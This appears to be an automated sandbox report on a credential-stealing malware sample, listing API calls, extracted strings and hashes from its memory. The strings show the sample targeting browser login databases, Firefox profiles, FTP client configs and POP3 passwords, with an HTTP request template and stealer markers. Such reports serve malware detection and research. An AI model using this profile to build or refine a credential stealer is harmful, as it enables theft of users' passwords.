                                        • Opcode Fuzzy Hash: a977a2671e64b89284aa4797132b113ab425a37900813f33374cc771d936be96
                                        • Instruction Fuzzy Hash: E0212C30904119ABEF219B61DD49BED7BB4BB04344F1080B7E508B21E1D7B89F85DF68
                                        APIs
                                          • Part of subcall function 00402745: lstrlenA.KERNEL32(?), ref: 00402779
                                        • StrStrIA.SHLWAPI(?,00416500), ref: 0040B87B
                                        • lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040B89D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmpilstrlen
                                        • String ID: CONSTRAINT$origin_url$password_value$username_value
                                        • API String ID: 3649823140-2401479949
                                        • Opcode ID: 16e4dc7e4ef01ce9c16bb48103be38913d76c0cfa088e7958cfbc766b5f3cc3d
                                        • Instruction ID: 4ad8d654800e676e8c0f777cd0841cf09402d808ff41cad8dd048d3ab0b6b04a
                                        • Opcode Fuzzy Hash: 16e4dc7e4ef01ce9c16bb48103be38913d76c0cfa088e7958cfbc766b5f3cc3d
                                        • Instruction Fuzzy Hash: F7114F36210108BADF512B25EC419DE3E92AB65798B00C13BF809A81B2E7FDC9D1969C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: IsRelative$Path$Profile$profiles.ini
                                        • API String ID: 0-4107377610
                                        • Opcode ID: 16b173c980c041cb8ef40059b41ae0beeef9dba8cf3cf2069a5cebe4f5dfc718
                                        • Instruction ID: a5cf65b25fed30015bcc003fb222cea83a273b45747e1a9c73aa150610851332
                                        • Opcode Fuzzy Hash: 16b173c980c041cb8ef40059b41ae0beeef9dba8cf3cf2069a5cebe4f5dfc718
                                        • Instruction Fuzzy Hash: 2B415231E4014ABAEF227B61CC42EAE7F62AF55344F10857BB410741F2DB7D8E91AB19
                                        APIs
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403AAC
                                        • InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403AD7
                                        • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403B1D
                                        • wsprintfA.USER32 ref: 00403B3C
                                        • lstrlenA.KERNEL32(?,00002000,00002000), ref: 00403B5F
                                        • closesocket.WSOCK32(?,?,00002000,00002000), ref: 00403B89
                                        Strings
                                        • GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403B34
                                        • <, xrefs: 00403AF7
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
                                        • String ID: <$GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                        • API String ID: 4072649068-555445111
                                        • Opcode ID: d5b6e7dc194c61fb16457503f2a04e989c6a0911f1b82a11c4ca794773bfea6a
                                        • Instruction ID: 745d6b9b5ac2693557a8ef43b3be1f9a406a0f3411fae1151c614a251de8c5b7
                                        • Opcode Fuzzy Hash: d5b6e7dc194c61fb16457503f2a04e989c6a0911f1b82a11c4ca794773bfea6a
                                        • Instruction Fuzzy Hash: 1041D771D00209EAEF11AFA1CC41FEDBEBAEF04349F10413AF500B52A1D7B96A56DB59
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004042B9
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004042D1
                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004042E2
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004042F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$CurrentHandleModuleProcess
                                        • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                        • API String ID: 977827838-3073145729
                                        • Opcode ID: b89d013479fd7981503fd72f968792317f90c829773311de0c1a3c6309231346
                                        • Instruction ID: b917eb2477d44a972aa321a1387145adad92c9960dbb5d4b81d2469f32f83685
                                        • Opcode Fuzzy Hash: b89d013479fd7981503fd72f968792317f90c829773311de0c1a3c6309231346
                                        • Instruction Fuzzy Hash: A1F05BB2700504A7C71061F56D55BDF26988BC03A8F241537B611E22C3F9FCCD814168
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <setting name="$value="
                                        • API String ID: 0-3468128162
                                        • Opcode ID: 254885ac01e82e6b167953d719254f945ca20f1f3678271b1f0b3f8db9da421c
                                        • Instruction ID: 96d0d4a0bd35fd51aa3680e7214a380573e8dbee4d8d9639b1d5f1cc1ff138dd
                                        • Opcode Fuzzy Hash: 254885ac01e82e6b167953d719254f945ca20f1f3678271b1f0b3f8db9da421c
                                        • Instruction Fuzzy Hash: 3A31A171D04149ABCF11ABE48C41AFEBFB59F1A354F144067E840B72A1E27D4A44DBAE
                                        APIs
                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E65
                                        • GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E72
                                        • CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00401E86
                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E9B
                                        • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EAA
                                        • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EB1
                                        • CloseHandle.KERNEL32(?,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401EC0
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$Create$MappingSizeView
                                        • String ID:
                                        • API String ID: 3733816638-0
                                        • Opcode ID: 8e23c6091eb8b8d46222d4bd7a16ced24ceefb6a7b190282a42a8e05d4c96427
                                        • Instruction ID: e58b99f9114672f5a439125ee997312c2d25841e4d564c066b43b0378391f37c
                                        • Opcode Fuzzy Hash: 8e23c6091eb8b8d46222d4bd7a16ced24ceefb6a7b190282a42a8e05d4c96427
                                        • Instruction Fuzzy Hash: C9117570290305BBEB312F31CC83F493A94AB01B14F208566BA24BD1E6D6F895918A6C
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00BA88C0,00000008,00BA3427,00000000,00000000,?,00BA28EB,00000003), ref: 00BA3330
                                        • __lock.LIBCMT ref: 00BA3364
                                          • Part of subcall function 00BA3B86: __mtinitlocknum.LIBCMT ref: 00BA3B9C
                                          • Part of subcall function 00BA3B86: __amsg_exit.LIBCMT ref: 00BA3BA8
                                          • Part of subcall function 00BA3B86: EnterCriticalSection.KERNEL32(?,?,?,00BA3369,0000000D,?,00BA28EB,00000003), ref: 00BA3BB0
                                        • InterlockedIncrement.KERNEL32(00BA9320), ref: 00BA3371
                                        • __lock.LIBCMT ref: 00BA3385
                                        • ___addlocaleref.LIBCMT ref: 00BA33A3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd
                                        Similarity
                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                        • String ID: KERNEL32.DLL
                                        • API String ID: 637971194-2576044830
                                        • Opcode ID: e9eb8c14be5c9c12decc70c20fb3ceb00b59bb44956a66ab37ff83320333533f
                                        • Instruction ID: 65036895dc877b88cb193361d6f4b791ecbaa6cbc46a09f5207ccca701533cb6
                                        • Opcode Fuzzy Hash: e9eb8c14be5c9c12decc70c20fb3ceb00b59bb44956a66ab37ff83320333533f
                                        • Instruction Fuzzy Hash: C80161B144CB009FD720AF65D806749FBE0AF52721F10898DF496977A0CFB4AA44CB14
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ftp://$http://$https://
                                        • API String ID: 0-2804853444
                                        • Opcode ID: 4d68b3de213bbb533016e734cc27d80bb7f6b0bac407aa0c9eb288f7c5a91484
                                        • Instruction ID: 14430d2e4d9b139479b5fe05e3a207768cfdf8799f0472e7796ca7e05dbc069a
                                        • Opcode Fuzzy Hash: 4d68b3de213bbb533016e734cc27d80bb7f6b0bac407aa0c9eb288f7c5a91484
                                        • Instruction Fuzzy Hash: E861F531800109FEDF11AF91CE45AEEBBB9EF00348F10847BB841B51A1DB799B95DB98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: "/>$winex="
                                        • API String ID: 0-1498080979
                                        • Opcode ID: 4e862831afe429a7723c9b686257d36e225ec81e112ed963a066b6d85ff6b397
                                        • Instruction ID: b71ab493d91fb56135b99ac2328879410403397ffda07896cc69c168d2b1a5e1
                                        • Opcode Fuzzy Hash: 4e862831afe429a7723c9b686257d36e225ec81e112ed963a066b6d85ff6b397
                                        • Instruction Fuzzy Hash: 65312D32D0011ABADF11BBA2CC02DFE7E76AF45344F10843BF501B51B1D7BA5A61AB69
                                        APIs
                                        • StrStrIA.SHLWAPI(011B3E08,FTPCON), ref: 00407FD5
                                        • StrStrIA.SHLWAPI(011B4128,FTP CONTROL,00000000,011B3E08,FTPCON), ref: 00407FE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .prf$FTP CONTROL$FTPCON$\Profiles
                                        • API String ID: 0-2908215140
                                        • Opcode ID: 97d11c7c0650f9f65763c2a736fe66c13482c928f6a8389b9809e5d0a63b14f2
                                        • Instruction ID: f802c4ae2033febdf439d4724e9f93f67ccd725fe0446867c1b7fdfc124186e1
                                        • Opcode Fuzzy Hash: 97d11c7c0650f9f65763c2a736fe66c13482c928f6a8389b9809e5d0a63b14f2
                                        • Instruction Fuzzy Hash: 4A01F534500504BADB217B719C06FEF3E599BC1364F24813BF940B61E2EB7C5A82879C
                                        APIs
                                        • __getptd.LIBCMT ref: 00BA49C7
                                          • Part of subcall function 00BA344C: __getptd_noexit.LIBCMT ref: 00BA344F
                                          • Part of subcall function 00BA344C: __amsg_exit.LIBCMT ref: 00BA345C
                                        • __amsg_exit.LIBCMT ref: 00BA49E7
                                        • __lock.LIBCMT ref: 00BA49F7
                                        • InterlockedDecrement.KERNEL32(?), ref: 00BA4A14
                                        • _free.LIBCMT ref: 00BA4A27
                                        • InterlockedIncrement.KERNEL32(00BA9320), ref: 00BA4A3F
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                        • String ID:
                                        • API String ID: 3470314060-0
                                        • Opcode ID: 5701f63cc9cfb677384c1952027d3023dc48f1614d7469fdf4eeb4cf3c63848f
                                        • Instruction ID: f00341591ab9248757cb41007319901de1e56ab9d7bd18d9429514e90bccfb97
                                        • Opcode Fuzzy Hash: 5701f63cc9cfb677384c1952027d3023dc48f1614d7469fdf4eeb4cf3c63848f
                                        • Instruction Fuzzy Hash: CA016D72A4C721ABD721AB689806B9FB3E0EB87B21F040195F414676A2CFB45D80DBD5
                                        APIs
                                        • GetHGlobalFromStream.OLE32(?,?), ref: 00401A22
                                        • GlobalLock.KERNEL32(?), ref: 00401A3D
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        • GlobalUnlock.KERNEL32(?), ref: 00401A65
                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401A6D
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$Local$AllocFreeFromLockStreamUnlocklstrlen
                                        • String ID: CRYPTED0YUI1.0
                                        • API String ID: 4083238039-1217275205
                                        • Opcode ID: 4d81ad40abc305974e2888dfa37e3fa96d503f79ed9f079c765dd97055f4b2fa
                                        • Instruction ID: 44e6d32a09d00c737fe28e090605fbfa6fdc0fd6aad9ff8f1e32deb7298a9f99
                                        • Opcode Fuzzy Hash: 4d81ad40abc305974e2888dfa37e3fa96d503f79ed9f079c765dd97055f4b2fa
                                        • Instruction Fuzzy Hash: 03119775D0010DBBDF026FA5CC429DD7F76AF04348F00817AB914B51B2D77A9BA1AB48
                                        APIs
                                        • GetHGlobalFromStream.OLE32(?,?,0040F8C0), ref: 0040F8D0
                                        • GlobalLock.KERNEL32(?), ref: 0040F8F1
                                        • GlobalUnlock.KERNEL32(?), ref: 0040F909
                                        • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040F8C0), ref: 0040F924
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$FromLockStreamUnlock
                                        • String ID: STATUS-IMPORT-OK
                                        • API String ID: 2287449323-1591331578
                                        • Opcode ID: 738e2649d5f168214c34fb7b132fde0e1642fa1de53005cf062b85737f1486cb
                                        • Instruction ID: e9a1e65df7326eb098ec69f3952359934b43089917577e5a60db32ab76f4fbe3
                                        • Opcode Fuzzy Hash: 738e2649d5f168214c34fb7b132fde0e1642fa1de53005cf062b85737f1486cb
                                        • Instruction Fuzzy Hash: 44015B71D0420CBBEF117BA2CD42A9D7B35AB01348F1081BBB850B11B2DB798A959A18
                                        APIs
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                          • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                          • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                          • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                        • lstrlenA.KERNEL32(?), ref: 00402286
                                        • StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                        • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$lstrcatlstrcpy
                                        • String ID: .exe
                                        • API String ID: 2414487701-4119554291
                                        • Opcode ID: bcdcc7ae0c40e859a05769187829805d13d282145717d4f82db59d9dcc97e831
                                        • Instruction ID: c4a03ac4e2a01c3cff7cfce351da15b716edf576a091f982ddc866c95ea47b67
                                        • Opcode Fuzzy Hash: bcdcc7ae0c40e859a05769187829805d13d282145717d4f82db59d9dcc97e831
                                        • Instruction Fuzzy Hash: A0F0C83120428579E72272A59D09BAF7F955B93744F24417FF500B62C2DBFCD882927E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <POP3_Password2
                                        • API String ID: 0-2923094552
                                        • Opcode ID: d9f474490d6a343b982c02591334732ffbbb79e7f9b79a0ff29d877bbbae0f02
                                        • Instruction ID: 2ca97c7d808ca1c1dc6ede0b735ecbf111c3d0c46ddc32b51a1637cf303f0207
                                        • Opcode Fuzzy Hash: d9f474490d6a343b982c02591334732ffbbb79e7f9b79a0ff29d877bbbae0f02
                                        • Instruction Fuzzy Hash: 30412F31904019FEDF116BA2CC018EE7E76AF48358F144937F501B51F1E7798E61ABA9
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CBC6
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CBEC
                                        • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC10
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC32
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CC1D
                                          • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                                        • String ID:
                                        • API String ID: 1890766102-0
                                        • Opcode ID: 934b97756b6a700027879f897ee5652c65a55fe5b21a80c67ea77db47f541946
                                        • Instruction ID: 7ab95b7534d6579ed3b9767e0ae932743c93dee75aa345241b3a12643bdaad8a
                                        • Opcode Fuzzy Hash: 934b97756b6a700027879f897ee5652c65a55fe5b21a80c67ea77db47f541946
                                        • Instruction Fuzzy Hash: 52216F71D44208FFFF116BA1CC86F9E7F75AB04314F20816AB214B91E1D7BD5A909B68
                                        APIs
                                        • _malloc.LIBCMT ref: 00BA5D7E
                                          • Part of subcall function 00BA5C5A: __FF_MSGBANNER.LIBCMT ref: 00BA5C73
                                          • Part of subcall function 00BA5C5A: __NMSG_WRITE.LIBCMT ref: 00BA5C7A
                                          • Part of subcall function 00BA5C5A: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00BA4F26,?,00000001,?,?,00BA3B11,00000018,00BA8930,0000000C,00BA3BA1), ref: 00BA5C9F
                                        • _free.LIBCMT ref: 00BA5D91
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd
                                        Similarity
                                        • API ID: AllocHeap_free_malloc
                                        • String ID:
                                        • API String ID: 2734353464-0
                                        • Opcode ID: 126aa0cd4bbaf6bd83302dc6565e0073fdbdffde6e56ae5bd07109f0123fce88
                                        • Instruction ID: 446e706f0486d37425003de9031f07398d228627da88ef32c62dcaa9a64c6502
                                        • Opcode Fuzzy Hash: 126aa0cd4bbaf6bd83302dc6565e0073fdbdffde6e56ae5bd07109f0123fce88
                                        • Instruction Fuzzy Hash: A811863284CA10AFCB312F74AC09A5A3AE5DF97761B2105B6F94896150DF318B4196A0
                                        APIs
                                        • StrStrIA.SHLWAPI(011B4128,FTP Navigator), ref: 00405A2F
                                        • StrStrIA.SHLWAPI(011B4128,FTP Commander,011B4128,FTP Navigator), ref: 00405A5D
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                          • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                          • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                          • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                          • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
                                        • String ID: FTP Commander$FTP Navigator$ftplist.txt
                                        • API String ID: 1884169789-2424314702
                                        • Opcode ID: 8ffd56609c937c8b0e29ab407aeaca567c2fb79e05fe6fc345a96c75e18709c7
                                        • Instruction ID: d98304a0afc87026386aaded3bd84dc36ec1ca4c9ab2c17e8643749e72736781
                                        • Opcode Fuzzy Hash: 8ffd56609c937c8b0e29ab407aeaca567c2fb79e05fe6fc345a96c75e18709c7
                                        • Instruction Fuzzy Hash: 6A01C270600505BADB1177628C06FBF3E5BDB81354F24413BB904B51E5DA7C5E818EAC
                                        APIs
                                        • StrStrIA.SHLWAPI(011B3E08,FTPNow), ref: 0040CE42
                                        • StrStrIA.SHLWAPI(011B3E08,FTP Now,011B3E08,FTPNow), ref: 0040CE53
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: FTP Now$FTPNow$sites.xml
                                        • API String ID: 0-284577462
                                        • Opcode ID: e85b3cb2380bbeee5d69e9919d2c1b42bce6bfef2b31001bda82e8b44ce36feb
                                        • Instruction ID: f3a7e70844c111737c6bf34252b67c8892eb3c8061eea0710213056f6df2ad90
                                        • Opcode Fuzzy Hash: e85b3cb2380bbeee5d69e9919d2c1b42bce6bfef2b31001bda82e8b44ce36feb
                                        • Instruction Fuzzy Hash: E6F0D670600105B5DB217771CC82F6F3E654B91758F24033BB524B51E2DFBDCA8196AD
                                        APIs
                                        • __getptd.LIBCMT ref: 00BA52C3
                                          • Part of subcall function 00BA344C: __getptd_noexit.LIBCMT ref: 00BA344F
                                          • Part of subcall function 00BA344C: __amsg_exit.LIBCMT ref: 00BA345C
                                        • __getptd.LIBCMT ref: 00BA52DA
                                        • __amsg_exit.LIBCMT ref: 00BA52E8
                                        • __lock.LIBCMT ref: 00BA52F8
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00BA530C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897701821.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000001.00000002.2897686886.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897716978.0000000000BA7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.2897731408.0000000000BAB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_ba0000_a5gvJhukP7.jbxd
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 938513278-0
                                        • Opcode ID: 203fa3779de82baab59e6dea5f7548544cbb6c1dbaa0a6f739c5715a9f5a3d1f
                                        • Instruction ID: eed670ac18b967e62f7e4a33f07424a6f070af35b6b4aa073188ea672a5206ba
                                        • Opcode Fuzzy Hash: 203fa3779de82baab59e6dea5f7548544cbb6c1dbaa0a6f739c5715a9f5a3d1f
                                        • Instruction Fuzzy Hash: FCF0907290CB10ABD671BB689803B5E76D0AF07B20F1541C9F401AB6D2CF745F40DA5A
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C3D2
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C3F4
                                        • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C408
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$OpenStorage
                                        • String ID: Settings
                                        • API String ID: 2489594185-473154195
                                        • Opcode ID: a38cb77ed92376c5c3d2c86b77c29051cae9eabeeff3c0da8091db23dd4a7770
                                        • Instruction ID: aecc0d1951bb4ed84c2bc1352e12af1dd0ef6abf2fee423dc7c1646d90439f1c
                                        • Opcode Fuzzy Hash: a38cb77ed92376c5c3d2c86b77c29051cae9eabeeff3c0da8091db23dd4a7770
                                        • Instruction Fuzzy Hash: 9D31BB31D4020AFBEF11AFA1CC42FAEBB76BF44704F208266B610791F1D6759A50AB58
